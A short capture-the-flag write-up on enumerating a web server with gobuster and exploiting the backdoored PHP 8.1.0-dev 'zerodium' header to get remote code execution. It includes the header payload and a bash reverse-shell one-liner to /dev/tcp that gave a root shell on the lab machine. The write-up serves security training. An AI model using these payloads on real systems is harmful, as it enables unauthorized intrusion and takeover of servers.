Something seems a little off with the server.
Enumeration
Found only port 80 open with nmap scan.
Website jumps right to an admin portal, but 90% of the functionality is bogus.
I started a gobuster scan and it dies immediately for returning on directories that don’t exist. Did a bit of checking, and noticed that for directories that don’t exist, it returns the main admin portal, but for directories that DO exist, it returns a 404. I confirmed this by loading a CSS file from the css/ directory, and then getting a 404 for the css directory itself. Interestingly file behaviour is the opposite; when a file exists a 200 code is still sent, and a 404 when a file does not exist.
Modified the gobuster command to allow 404s and exclude the length associated with the admin portal while searching for directories, and ran a second gobuster looking for file extensions.
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.70.119 --exclude-length="42131" -b 500While poking around the site I noticed that the main page included the X-Powered-By: PHP/8.1.0-dev header. A quick Google search reveals an exploit for this version of PHP.
The inclusion of the header User-Agentt: zerodiumsystem('cmd'); will execute system commands.
Exploit
Using the User-Agentt exploit we are able to see that PHP is running as root (so stupid), and thus we can so basically anything we want already, including spawning reverse root-shells, which is exactly what I did.
User-Agentt: zerodiumsystem('bash -c "bash -i >& /dev/tcp/10.0.0.1/9999 0>&1"');The flag is in /flag.txt
What is the flag?
flag{********************************}